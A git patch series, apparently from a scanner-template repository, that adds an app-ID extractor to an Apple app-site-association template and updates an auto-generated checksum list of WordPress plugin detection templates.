sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Fri, 1 Sep 2023 14:26:38 +0530 Subject: [PATCH 0061/1090] Added App IDs in extractor --- http/miscellaneous/apple-app-site-association.yaml | 5 +++++ 1 file changed, 5 insertions(+) diff --git a/http/miscellaneous/apple-app-site-association.yaml b/http/miscellaneous/apple-app-site-association.yaml index e121f492a9..ba827693c1 100644 --- a/http/miscellaneous/apple-app-site-association.yaml +++ b/http/miscellaneous/apple-app-site-association.yaml @@ -34,3 +34,8 @@ http: - type: status status: - 200 + + extractors: + - type: json + json: + - .applinks.details[].appID \ No newline at end of file From d54b5b3499cb7873f285c60950359485aab34bd5 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 1 Sep 2023 08:57:14 +0000 Subject: [PATCH 0063/1090] Auto Generated Templates Checksum [Fri Sep 1 08:57:14 UTC 2023] :robot: --- templates-checksum.txt | 420 ++++++++++++++++++++--------------------- 1 file changed, 210 insertions(+), 210 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 18fab056b9..f93ac4526e 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -367,7 +367,7 @@ helpers/wordpress/plugins/adminimize.txt:f6eef27f4f1b21ffb32d92f3a8eee2e89d01c7d helpers/wordpress/plugins/advanced-custom-fields.txt:358a36934535cdb0f43c2bd34f8032939c89dee3 helpers/wordpress/plugins/akismet.txt:4380b93c5f9e9e252ac9ac548449d65f955603c4 helpers/wordpress/plugins/all-404-redirect-to-homepage.txt:e5d05199b7d43b0bd203a9cf2e8e874dad4ff45f -helpers/wordpress/plugins/all-in-one-seo-pack.txt:5e3c54ec1686b257c15fe3bd98af9e08d983b8ab +helpers/wordpress/plugins/all-in-one-seo-pack.txt:bf1d607adfeedd476ba3e3fba79a756e25035222 helpers/wordpress/plugins/all-in-one-wp-migration.txt:addf63c8a9f97e52b5b7aca6dc435f3680b17d2a helpers/wordpress/plugins/all-in-one-wp-security-and-firewall.txt:32caf6abda6a7a1a799e1775e6c5b3e7e32ad59f helpers/wordpress/plugins/amp.txt:cc005cc7de6351bdaa671675148c076564275a57 @@ -377,11 +377,11 @@ helpers/wordpress/plugins/astra-widgets.txt:386ef6797a9c4de50f240b16bd76bbeae35a helpers/wordpress/plugins/autoptimize.txt:661ae89c9a4b16c450c2a094d410c4ee74719cb3 helpers/wordpress/plugins/backwpup.txt:063ee00ca80d81e068dd404b59ceb2a03b2e7109 helpers/wordpress/plugins/better-search-replace.txt:08d2e98e6754af941484848930ccbaddfefe13d6 -helpers/wordpress/plugins/better-wp-security.txt:c54fa79bac14562d677ca2be716dc363653d1cd4 +helpers/wordpress/plugins/better-wp-security.txt:ddc49152d337977df228a63c029f8c815c822ce2 helpers/wordpress/plugins/black-studio-tinymce-widget.txt:b74c052eec677c340bd7f99d94e1557d1f1d5e53 helpers/wordpress/plugins/breadcrumb-navxt.txt:3eebc7c9c53af6e2c8a91094b656f824a4b7150b helpers/wordpress/plugins/breeze.txt:7277d832c4a280d1c4cd0f4bf3169bf93d46d49e -helpers/wordpress/plugins/broken-link-checker.txt:bf64dd8c92190417a38d834b0c92eee4be757761 +helpers/wordpress/plugins/broken-link-checker.txt:53847c48faeb5e255ebcdd1a4762a53f7163d7f0 helpers/wordpress/plugins/child-theme-configurator.txt:8e805063c85859847271163a1c51e5865e460aea helpers/wordpress/plugins/classic-editor.txt:933c3d96b7fbc319e2e08dda5c340797d7c8d99f helpers/wordpress/plugins/classic-widgets.txt:98250286db92ccc336dc6f622c10c8bc09286693 @@ -395,7 +395,7 @@ helpers/wordpress/plugins/complianz-gdpr.txt:b12395a5190cbd66359bb94c3f32f0635e3 helpers/wordpress/plugins/contact-form-7-honeypot.txt:488784591515bd4cdaa016be4ec9b172dc4e7caf helpers/wordpress/plugins/contact-form-7.txt:77526ddfb1469f41739fcab554059141c36d9329 helpers/wordpress/plugins/contact-form-cfdb7.txt:c6802dfc6ada46af8820db93c237d00787bd441c -helpers/wordpress/plugins/cookie-law-info.txt:7c49f6117c3f09ee90548ad70960b7a9b716deb8 +helpers/wordpress/plugins/cookie-law-info.txt:049a35ad82b9c914dc50f602563d1e37e06ef9a6 helpers/wordpress/plugins/cookie-notice.txt:6b67ce6c1930ff8e1d5003aeb8218f8fbdd4e6d2 helpers/wordpress/plugins/creame-whatsapp-me.txt:08d2e98e6754af941484848930ccbaddfefe13d6 helpers/wordpress/plugins/creative-mail-by-constant-contact.txt:5c09cf3589e93781df4d59ed6b5a5d6207e2929c @@ -458,19 +458,19 @@ helpers/wordpress/plugins/leadin.txt:4ea6749184af2616dda4c6d36597b267338ca299 helpers/wordpress/plugins/limit-login-attempts-reloaded.txt:eb7b3babdf22a684d0ea8660470e63f0a4a6f2d6 helpers/wordpress/plugins/limit-login-attempts.txt:08d2e98e6754af941484848930ccbaddfefe13d6 helpers/wordpress/plugins/litespeed-cache.txt:a2246273db175b4d951c8ae09a9b87d55b422463 -helpers/wordpress/plugins/loco-translate.txt:5f099bc6f95ad230bf3e17b9745270e13ee50606 +helpers/wordpress/plugins/loco-translate.txt:c1c423f2f1813573ad1b704e4b6aea927ed8deb9 helpers/wordpress/plugins/loginizer.txt:9829113ed356f261f9202f78259f32919e9e5d9b helpers/wordpress/plugins/loginpress.txt:4ea93c6a1e320054f99d66f428e611b31355cd92 helpers/wordpress/plugins/mailchimp-for-woocommerce.txt:08d2e98e6754af941484848930ccbaddfefe13d6 helpers/wordpress/plugins/mailchimp-for-wp.txt:d962fd9a839a218de0c95dddb4f7e937cdd40d38 helpers/wordpress/plugins/mailpoet.txt:4e0e9b8af035e0887466f99581b3657149805e2c -helpers/wordpress/plugins/maintenance.txt:254b136ca21ea7ce53096fd367ddb29c22a7cce9 +helpers/wordpress/plugins/maintenance.txt:676c72a3610df638213dbd14937d1a1d3541b924 helpers/wordpress/plugins/mainwp-child.txt:59a7597c10f2e831aaf8a6526fb9a13e25ea680e helpers/wordpress/plugins/malcare-security.txt:110e72e19320b384e7459b22647e5acdb0255c57 helpers/wordpress/plugins/megamenu.txt:403a4300e5939d1d7fbfb90958aac5b413468ba3 helpers/wordpress/plugins/members.txt:237c8767860dc44f0f30057d25e9143e3d0b425f helpers/wordpress/plugins/meta-box.txt:1f35081e09d2a2ed9d9cb39777ed8121a68d0cee -helpers/wordpress/plugins/ml-slider.txt:32f71be2b08c58a10d49f26fdb35bf06c8f20122 +helpers/wordpress/plugins/ml-slider.txt:f6b24d20fb8ca8547810ce73f202e02919d356e0 helpers/wordpress/plugins/newsletter.txt:14665694dff2d37ef9323cf70015fe0466bea9b2 helpers/wordpress/plugins/nextend-facebook-connect.txt:deccc3cf363403cddb880388388bf192fbcfd655 helpers/wordpress/plugins/nextgen-gallery.txt:f2cc8874a54d8d40b341d84839c1b2984efc0aba @@ -536,7 +536,7 @@ helpers/wordpress/plugins/woo-checkout-field-editor-pro.txt:381bb12da04a82580bb6 helpers/wordpress/plugins/woo-variation-swatches.txt:08d2e98e6754af941484848930ccbaddfefe13d6 helpers/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.txt:5b7155a36d36681935655d772bbc981bc2393fa3 helpers/wordpress/plugins/woocommerce-gateway-stripe.txt:85e58fba8dcfa56b29939775178a4af11946316b -helpers/wordpress/plugins/woocommerce-payments.txt:e0e8632bccfe7cb1511a277abb9bd5fbc2e087a6 +helpers/wordpress/plugins/woocommerce-payments.txt:f761ee50908e2e01cb058b4b2f46366c4d288e93 helpers/wordpress/plugins/woocommerce-paypal-payments.txt:53847c48faeb5e255ebcdd1a4762a53f7163d7f0 helpers/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.txt:cc1586242918f22469f32e7d30bae9a88f411c48 helpers/wordpress/plugins/woocommerce-services.txt:7cfe54f27289e2e996bf2e77df14202ff94111f9 @@ -4224,7 +4224,7 @@ http/iot/webtools-home.yaml:8fac1b9a4c40b7a99a33895c75dcd2be623e1965 http/iot/xp-webcam.yaml:6a17a29da87ffe3b4a382c6ed2e4ca38c148e54e http/iot/zebra-printer-detect.yaml:3ac7d5f177a91a5ee89411ead8e073a72a10997e http/miscellaneous/addeventlistener-detect.yaml:49f913e72df50e18eb80458c9fbb5df10d4253b6 -http/miscellaneous/apple-app-site-association.yaml:c6da929223cda667179226cfba083fc9692c7dac +http/miscellaneous/apple-app-site-association.yaml:541c9e23a52f733b557f3e0a7edee2d9d66069b8 http/miscellaneous/aws-ecs-container-agent-tasks.yaml:e19643775ad6c43b074bc8773f31dce3dba3fd05 http/miscellaneous/clientaccesspolicy.yaml:d2ebcdf18a9e115d28ec5418618dde3de28439b6 http/miscellaneous/crypto-mining-malware.yaml:253d42ee74ffdb0947f1ec2df0ae4f2a5645bedb @@ -5793,217 +5793,217 @@ http/technologies/weblogic-detect.yaml:e7cd5e93e7dd6c1625553aa3ad3c5b47e9bfb498 http/technologies/werkzeug-debugger-detect.yaml:d840275037a23f116bab272b6d7658cd9156e8af http/technologies/wms-server-detect.yaml:45c90b9c1ebd969c113b5226d8714e38434a6813 http/technologies/wondercms-detect.yaml:b485ce65e953f7a8d97fc2bdb7e8e81f9900b114 -http/technologies/wordpress/plugins/ad-inserter.yaml:dcc200a556b9acbe534e1602320c36a7de790bdd -http/technologies/wordpress/plugins/add-to-any.yaml:0a6b25111eae4afc694c46433e2c508ea2b90539 -http/technologies/wordpress/plugins/admin-menu-editor.yaml:8602eaf564f6138e2a37576450107bfddbe34a51 +http/technologies/wordpress/plugins/ad-inserter.yaml:f6e7f6ffa7889adea4d25065e99b592f729482ed +http/technologies/wordpress/plugins/add-to-any.yaml:7b142b33ba32b11c48ff8313881a6ce6805d6bf1 +http/technologies/wordpress/plugins/admin-menu-editor.yaml:364449c7a34df835665302b9eca8dd8c83fada4e http/technologies/wordpress/plugins/adminimize.yaml:3f8e114ab592d30a1d4195f22d46de3b9fc28ed0 -http/technologies/wordpress/plugins/advanced-custom-fields.yaml:9f506de2bcca6885f35c46248b4504aaad538724 -http/technologies/wordpress/plugins/akismet.yaml:b007755cc48a7a531a0e8fa3c452f9f74b483a5c -http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml:8afc7d83bef5b26cba75228a1713dfa60348deba -http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:0010ec5c05b69f5ebddee94a9ce0d4b57e44ff27 -http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:c3da676f6d0fa160cc7394abf4c7d8daf4f0fe96 -http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:f06de6db272be3eaa03e68865e41fd8cd0889d6e -http/technologies/wordpress/plugins/amp.yaml:6e95aadb383bc37245be179768ef3666595c84d4 -http/technologies/wordpress/plugins/antispam-bee.yaml:cbc2eb83f595229655ccae5e68e201f8fbbdfc3f -http/technologies/wordpress/plugins/astra-sites.yaml:88922bff5ff8b290d2e3d0dff8a85a3a3b71be07 -http/technologies/wordpress/plugins/astra-widgets.yaml:ae52d4e01aa55255f0351c2ebf24e5f6a05f46c1 -http/technologies/wordpress/plugins/autoptimize.yaml:279ce12aeb07a219ddde6d8d3b8bdfe7854b545c -http/technologies/wordpress/plugins/backwpup.yaml:cd98534e9f211629ba533369d19b35889d667dff -http/technologies/wordpress/plugins/better-search-replace.yaml:f0fb1b87ddb8ba11b1b34fc352dcfe60ec8bd32a -http/technologies/wordpress/plugins/better-wp-security.yaml:366bc515c9eea0caf24103811f783af87309bc1e -http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:cf370287b480191433f14d22645180352e012309 -http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:1d9ebeb7f6912abd70c1d5ff211c9bc312e8437c -http/technologies/wordpress/plugins/breeze.yaml:c9d3a0b31311eeb12035b292ea0beb6de100161d -http/technologies/wordpress/plugins/broken-link-checker.yaml:3632271104d26b8bca780450cc8bda6c00a2904a -http/technologies/wordpress/plugins/child-theme-configurator.yaml:3346ba95537fd3c405732fb81d7d459a22cd7eae -http/technologies/wordpress/plugins/classic-editor.yaml:7eac99fe2332bcd2d61540094502911352f9b299 -http/technologies/wordpress/plugins/classic-widgets.yaml:e5b45b37d0a85fd0e54c21716ca57f5ade443aa7 -http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:9e23b288bbe247ec7fc8a1ee5be22e37886f5fd9 +http/technologies/wordpress/plugins/advanced-custom-fields.yaml:5f663f06fb30dd885af3c87149ec7bddce2b7fc0 +http/technologies/wordpress/plugins/akismet.yaml:c2fc28f9352683a8951ff433fcd774b49feaf0eb +http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml:65a31735844abbc42c6c38fb1b2ce66f3b70637e +http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:c5fb4f5f04f4d44c858cce9bdcbe7f3606a68f65 +http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:6b1337d51ba70633ffcb1f7ee597e124cc495a61 +http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:6c34983a451921b4871a71a257642648e00cdebc +http/technologies/wordpress/plugins/amp.yaml:3edc2817a56cd8ad27f32ec268ac6193395862f2 +http/technologies/wordpress/plugins/antispam-bee.yaml:fdc8552f09d28482637a53d5be385512a8d3ee12 +http/technologies/wordpress/plugins/astra-sites.yaml:99290366c13ca50eb0e8f80466e00581c822280b +http/technologies/wordpress/plugins/astra-widgets.yaml:f7265954d79f2976d51ea04401b8371971a8d226 +http/technologies/wordpress/plugins/autoptimize.yaml:e11ed09133228a907ca069378035ce38b4f72f77 +http/technologies/wordpress/plugins/backwpup.yaml:f465ab2fac2cb5d33cbb273e95c99d266ad6ac46 +http/technologies/wordpress/plugins/better-search-replace.yaml:08d9193490a1131216e86ec2dbcc5806db67bf61 +http/technologies/wordpress/plugins/better-wp-security.yaml:31ac060d2dac4ff16c700f62cce3e478c5f0f66f +http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:55f69d7e5dca5a91d82d0908d11edf7be0cb1349 +http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:0d81c1c43b8b4acd5ebad30efb116564a06d295f +http/technologies/wordpress/plugins/breeze.yaml:c366593628c83c9881d375890e07e63cfa8d552b +http/technologies/wordpress/plugins/broken-link-checker.yaml:df71812c7fa02109aba6905b6adde546c4ac0365 +http/technologies/wordpress/plugins/child-theme-configurator.yaml:2cb6529ade42bd6e577fa6f61a9f3d66cac32e4f +http/technologies/wordpress/plugins/classic-editor.yaml:fc682aceca9126c4e072c73ff29851a83979cd55 +http/technologies/wordpress/plugins/classic-widgets.yaml:17210161b9efea8396d8445ae4d4cba98e660ba4 +http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:0a881196a64744bda68c6f1c2681bfd2f84d0ce3 http/technologies/wordpress/plugins/cloudflare.yaml:66dcdb39cea465cbf038ff429f48620493d09369 -http/technologies/wordpress/plugins/cmb2.yaml:eb137984c82ed5d64c29685b14a6c20d443be844 -http/technologies/wordpress/plugins/coblocks.yaml:0b67f9d55e292e698889ac4b63809c2468d3ed2c -http/technologies/wordpress/plugins/code-snippets.yaml:69feff2b5e8275ebd75f53eff59ee2a912f26636 -http/technologies/wordpress/plugins/coming-soon.yaml:679f3b88eb2da31b32e3180cceccd25d7f60e86e -http/technologies/wordpress/plugins/complianz-gdpr.yaml:35ff2d819699fc3c4d35d44702d09ec841fdb61d -http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml:81b00a965871cb891ebfbbc4a1368692c89c106a -http/technologies/wordpress/plugins/contact-form-7.yaml:ed800082cc23cf6479f6cc46302bbf76f3a514ef -http/technologies/wordpress/plugins/contact-form-cfdb7.yaml:a54ed3ad529d498c2c8b8c0d46b2794a2a729e4f -http/technologies/wordpress/plugins/cookie-law-info.yaml:3bd4cc6049acf423c429e570491594ff3b5007a7 -http/technologies/wordpress/plugins/cookie-notice.yaml:198f4bf51ae86e3bbea603b127caca8f2e5a9057 -http/technologies/wordpress/plugins/creame-whatsapp-me.yaml:373d91b4dd303509b7cab8348231294d9ea8cbb3 -http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml:2b73cbbc4598fa9184ea8d3c52b166fc6fee1459 -http/technologies/wordpress/plugins/custom-css-js.yaml:b6291ea7e296f32148ed13099711f9c9f0a2f3ad -http/technologies/wordpress/plugins/custom-fonts.yaml:406c61fa1dbba79b5b47c44d0b972dd409aecf8c -http/technologies/wordpress/plugins/custom-post-type-ui.yaml:15eff4815c8fec2b7907295243812d1f51b1697f -http/technologies/wordpress/plugins/disable-comments.yaml:b7fbaf360dc5246357ccdc9e819d384238cddbb7 -http/technologies/wordpress/plugins/disable-gutenberg.yaml:6af6a0b5b5d096f9563c30a4fd20e0cff5ae03d0 -http/technologies/wordpress/plugins/duplicate-page.yaml:aadea56bc4af197b7e6a6c3f374358b6e0af09af -http/technologies/wordpress/plugins/duplicate-post.yaml:81174cfbdf40b99a59b5d60a4451a7124506825a -http/technologies/wordpress/plugins/duplicator.yaml:f8cffcb16fc6b08355823d28e32a79daa7549677 -http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml:d855708559e81537cb85f5acc6bace4c0d4b3121 -http/technologies/wordpress/plugins/easy-fancybox.yaml:e41968a186a45de3a74a86d93ee1967c67ce7984 +http/technologies/wordpress/plugins/cmb2.yaml:4b3bfa4f94b99997f974f02d6ba60bde2e9444ff +http/technologies/wordpress/plugins/coblocks.yaml:a26991d803bee4cd24a8fee62e7eea4c1bb2d43a +http/technologies/wordpress/plugins/code-snippets.yaml:d1187e6e58951bbe1df401c1672bfdff86f7422e +http/technologies/wordpress/plugins/coming-soon.yaml:516f9d73fc15789a4c0fd099fc7e4a95fdb0f14f +http/technologies/wordpress/plugins/complianz-gdpr.yaml:eabd8b2e7f97de8a60b3a5fb96527910bbbad58d +http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml:f28aad38a4e879235502a3c7abc1eaac996a53af +http/technologies/wordpress/plugins/contact-form-7.yaml:7ce85ff130f51b9380933293b884a7bd421404eb +http/technologies/wordpress/plugins/contact-form-cfdb7.yaml:6acd231ac9daa0db29c8cd2ffc15f41bc9ababfb +http/technologies/wordpress/plugins/cookie-law-info.yaml:1105f8252666a84437fde4945cb5a745ad4cc50e +http/technologies/wordpress/plugins/cookie-notice.yaml:b9cf44d527d7f63a289ac0abad8b1bf0391c678c +http/technologies/wordpress/plugins/creame-whatsapp-me.yaml:fd3988a6aa03120a677f1ac21834661ce302bf06 +http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml:9e9f37e33437158126c61d2345001ba7d43111e7 +http/technologies/wordpress/plugins/custom-css-js.yaml:ac02742559638f742970cf6f592b71ef94d7f9e0 +http/technologies/wordpress/plugins/custom-fonts.yaml:b5239c6679c226595580307f84fbc3db513ed75c +http/technologies/wordpress/plugins/custom-post-type-ui.yaml:e185e81e02d08d559172e553c9f18124e8b73cf9 +http/technologies/wordpress/plugins/disable-comments.yaml:09bef99b79703f8fb60a432875789f36c26d7606 +http/technologies/wordpress/plugins/disable-gutenberg.yaml:589db5b5a0c17c5eaa8aed3193f9b69c9c23d157 +http/technologies/wordpress/plugins/duplicate-page.yaml:d686911fad8f2cb38247ac68abde6798a75b3d1a +http/technologies/wordpress/plugins/duplicate-post.yaml:95098c9e322716725f42517fa291102be287a7b5 +http/technologies/wordpress/plugins/duplicator.yaml:492e234d249eac52e0108c1bef2ecd318f8264a7 +http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml:f4ad26e875f78de817b30426b87b4a68cbaeaea2 +http/technologies/wordpress/plugins/easy-fancybox.yaml:e7f7398e360ec865076174206ebfa8588fe9d55e http/technologies/wordpress/plugins/easy-google-fonts.yaml:7f9b02d3513ca7ddbcb4bf0c320b049328a8bc45 -http/technologies/wordpress/plugins/easy-table-of-contents.yaml:d4e688094d6176459fa903f03e5794848ed3e201 -http/technologies/wordpress/plugins/easy-wp-smtp.yaml:2ff0f61226aa4cb1038d1deadb00b628fb11fcab -http/technologies/wordpress/plugins/elementor.yaml:9b1e616a8d2a7aa975ade54df7ac7b163608fff8 -http/technologies/wordpress/plugins/elementskit-lite.yaml:9009b721e1e10135e8fc85c73ae6f5751e4caa77 -http/technologies/wordpress/plugins/enable-media-replace.yaml:bfdc2e4c8cee949b2a0acf9cddee4a5f274c436e -http/technologies/wordpress/plugins/envato-elements.yaml:7f185f2a48254a6e7eef6b04e33ff07f51ae00ca -http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml:1b41b69c540670905044d6160174bac6e3d4f4fa -http/technologies/wordpress/plugins/ewww-image-optimizer.yaml:ec19e982e470dd524292e10f70375d8ae67a8444 -http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml:55791747a6edcd4640bf8a226177d45718be4016 -http/technologies/wordpress/plugins/fast-indexing-api.yaml:f2c919579c4175d28f460e99e74a7df0fa2ea0b1 -http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml:598bc18c24af5cbccae989df8850aca7340f8fba -http/technologies/wordpress/plugins/flamingo.yaml:5c4b2b9c517ac144776be3e131329935bae6be4d -http/technologies/wordpress/plugins/fluentform.yaml:cd0f4c67c902c283b058c0ed20d9e32affaee823 -http/technologies/wordpress/plugins/font-awesome.yaml:223d15376ae6c792e52d7b98d397937c66e393d0 -http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml:3bfb2d4b85fff045a44a5c46c4898e4b597b6a24 -http/technologies/wordpress/plugins/formidable.yaml:6d9ebfa32167bad11c9f2cf5d0bc667ec79beeca -http/technologies/wordpress/plugins/forminator.yaml:65bf97572551361b4820617abf6f162b6d3f9336 -http/technologies/wordpress/plugins/ga-google-analytics.yaml:524a46fd50ca7ec755f6582146688a4fa2143b6a -http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml:527715654d1ac3521c3f4ad6efb0035abce008f3 -http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml:084d783cf9aa3011d022dc95b4e5ac20e48ea1f3 -http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml:2e6e89dc6c07e0014c4e5eac1dd7dde3afe8f7ae -http/technologies/wordpress/plugins/google-listings-and-ads.yaml:dee7755fce70b6704235ecc3b81c8b5c109b0053 -http/technologies/wordpress/plugins/google-site-kit.yaml:ccc5e9a3f54cc6770ef8890b45f19920222168b0 -http/technologies/wordpress/plugins/google-sitemap-generator.yaml:c107504273792eb9abb00fe3212427a55f7e5214 -http/technologies/wordpress/plugins/gtranslate.yaml:867ab5c990ea0420f453a184bc502168a32ef7fc -http/technologies/wordpress/plugins/gutenberg.yaml:3e27b07a160e8df4cd945aaafdcae5571c5a2ffb -http/technologies/wordpress/plugins/happy-elementor-addons.yaml:a156496d7c3273674d39d1fcec6e8e247f70ebe9 -http/technologies/wordpress/plugins/header-and-footer-scripts.yaml:1b17cd6fbfb1b2b4610c8bebd52a32d56ccb5913 -http/technologies/wordpress/plugins/header-footer-code-manager.yaml:8474198d250ca4bdc0ab5c12cf23a9b51fd06372 -http/technologies/wordpress/plugins/header-footer-elementor.yaml:b0587c2319227b07a3d692aaa7c257888be39765 -http/technologies/wordpress/plugins/header-footer.yaml:df3106a1b40b9c5568e26e4b607dbd0d4da769e2 -http/technologies/wordpress/plugins/health-check.yaml:dbf87bd510108d015a180d3fbc03d45481974f23 -http/technologies/wordpress/plugins/hello-dolly.yaml:7b7773fcf3893f955e07987ab3d466472e47fdd7 -http/technologies/wordpress/plugins/host-webfonts-local.yaml:acf3cb5d65df4d20d1cb4519f1cce6d463570317 -http/technologies/wordpress/plugins/imagify.yaml:07d8654f8cfc0bc3fac475b458b6f8b13ff29461 -http/technologies/wordpress/plugins/imsanity.yaml:d5a2c4b44c29eda5354bbc3339421a248342f5e4 -http/technologies/wordpress/plugins/insert-headers-and-footers.yaml:29df4caa3ec72e270a5b680cc6dba22aa42f7b30 -http/technologies/wordpress/plugins/instagram-feed.yaml:bdd26849be9346090645fcedf5e7c21f9634433e -http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml:4f680679454744ffce822ef8103f9e502945cc5b -http/technologies/wordpress/plugins/iwp-client.yaml:d439a22263fa52c4f97b1ddbf87db0463426d40f -http/technologies/wordpress/plugins/jetpack-boost.yaml:5344e84ef6d9c77864a3b4b68bfe1d966436d391 -http/technologies/wordpress/plugins/jetpack.yaml:bf3f2dc921b1ed41c10ceec1ddf4dc25f1b53cde -http/technologies/wordpress/plugins/kadence-blocks.yaml:16f4dd00133170c2d369e444dfcc3d37ff77d43a -http/technologies/wordpress/plugins/kirki.yaml:c97031d4389c1390ccf770aa86ab3b3fa35f1dac -http/technologies/wordpress/plugins/leadin.yaml:459b7e97592be0f092c2b3b49de24d496bc02fcc -http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml:24602fdc3551beca9567c9610cd9d3b4fee0f7b3 -http/technologies/wordpress/plugins/limit-login-attempts.yaml:7f83455afdb4b27fb6b3db7237206de3a6cb7046 -http/technologies/wordpress/plugins/litespeed-cache.yaml:80d84515b9a1ce2d934ae05e2f5a88f18e0ca5a8 -http/technologies/wordpress/plugins/loco-translate.yaml:6e88f4e9ef7197d8de502fd14f47f79b4b46911b -http/technologies/wordpress/plugins/loginizer.yaml:fd0116df11b6730957c17fea8fcc5ce1a7df96c0 -http/technologies/wordpress/plugins/loginpress.yaml:318058c81cfee1d55915a2fbf2ac027d7462b50c -http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml:d96413ced20b451ef657a655f3ba333575a1b2e3 -http/technologies/wordpress/plugins/mailchimp-for-wp.yaml:d166e9194d9700180585945fa717b01849fb0519 -http/technologies/wordpress/plugins/mailpoet.yaml:28a36b2dbcef7a1e49f30ff165907da3576693b4 -http/technologies/wordpress/plugins/maintenance.yaml:46343810ab17d627079432942446302dca630eeb -http/technologies/wordpress/plugins/mainwp-child.yaml:1a90cfff9eaeab8c397b5269876f7b469cfff7b4 -http/technologies/wordpress/plugins/malcare-security.yaml:20cae47466ca8201c6fbfd58324fe1bc90db9623 -http/technologies/wordpress/plugins/megamenu.yaml:dcdca3e0704e25dcc813c121039640b907274fcd -http/technologies/wordpress/plugins/members.yaml:2e78a795ed43f766f8bfd3bb528fd0ff2f0fddfb -http/technologies/wordpress/plugins/meta-box.yaml:529232e3db137e3bac4eddcee8768ec4c34e7510 -http/technologies/wordpress/plugins/ml-slider.yaml:7c2b57d5255ea5e2cc0ee747502fb24949f46015 -http/technologies/wordpress/plugins/newsletter.yaml:12033cfd493029024d58d9ff46d4d4a8d0a1c3d9 -http/technologies/wordpress/plugins/nextend-facebook-connect.yaml:21d9b6618fa59927c3833821306bd42ec7c89d29 -http/technologies/wordpress/plugins/nextgen-gallery.yaml:6cabf694d018ce86f802bdac15b8f18c05c373bf -http/technologies/wordpress/plugins/ninja-forms.yaml:346bd7fe3cd6070a50760d1094b93dca734947c8 -http/technologies/wordpress/plugins/ocean-extra.yaml:42bf83b1af5749122b0405343ba20331e27e02f5 -http/technologies/wordpress/plugins/official-facebook-pixel.yaml:ff48ca47c1758494b8faf44a9e8d82c0d0545fa4 -http/technologies/wordpress/plugins/one-click-demo-import.yaml:2859e55dd6c58174f198bb2661309cb20b9bc159 -http/technologies/wordpress/plugins/optinmonster.yaml:ad36d7e2024e606ed95427ae8fddbddcbb5be5af -http/technologies/wordpress/plugins/otter-blocks.yaml:a78a532c8c365f7d5389a154c72ffab4a9e198f9 -http/technologies/wordpress/plugins/password-protected.yaml:6878b6ec0edd97837a248d2082b59b73a5c0bd68 -http/technologies/wordpress/plugins/pdf-embedder.yaml:b81ffb6ceaacadea709eba4d896f253a3798ae18 +http/technologies/wordpress/plugins/easy-table-of-contents.yaml:d3c9f699fb74e4dc40d444164fa0494e1cf074b7 +http/technologies/wordpress/plugins/easy-wp-smtp.yaml:3b1527653b38dd2d7f394cc9533036489f9fce72 +http/technologies/wordpress/plugins/elementor.yaml:d4492f2c80f46cd5b7504d20216f6b04cb6f8e77 +http/technologies/wordpress/plugins/elementskit-lite.yaml:e860f44f9333f49b1db0078924daae6638877ffb +http/technologies/wordpress/plugins/enable-media-replace.yaml:68642f24029f3db57cae0875e14691319d3b70c8 +http/technologies/wordpress/plugins/envato-elements.yaml:7c6694d04e8f12566bae8c1a88d3b72af93d5bc1 +http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml:0901f4c382a1bac147c98dc2e9eff2b4ddb7df8d +http/technologies/wordpress/plugins/ewww-image-optimizer.yaml:1ab8aca4a953aa2c5d9a4d194e2dd542fc2f30a0 +http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml:de8926a47352fc0663b8fda59114cadbadfccc30 +http/technologies/wordpress/plugins/fast-indexing-api.yaml:f8910398d8ff2b72d2cbed02c12969f91f1a98bb +http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml:30f4140ccdd9537b0c43406fe41bafe606d3bc9f +http/technologies/wordpress/plugins/flamingo.yaml:2de9fdc9bd0b68fcf4d242b5f451f9ba3a2303a2 +http/technologies/wordpress/plugins/fluentform.yaml:70d27d79bda7c73e6d27c178bc5d94bf99464ad5 +http/technologies/wordpress/plugins/font-awesome.yaml:ace5d85da13205aeaf68512050aa814f985c5d4a +http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml:570ff31870d573d58b0bf813509a9f6331a1a3a9 +http/technologies/wordpress/plugins/formidable.yaml:32a327178f46ea958960289447857fddba33ac33 +http/technologies/wordpress/plugins/forminator.yaml:4daad6ee961bae4cbcd3f28f38fcc75af7f51599 +http/technologies/wordpress/plugins/ga-google-analytics.yaml:9770b6b2bb9d584795991ddc406c0662d71631a1 +http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml:042614556f90068b63495664f065b46e7074c2e4 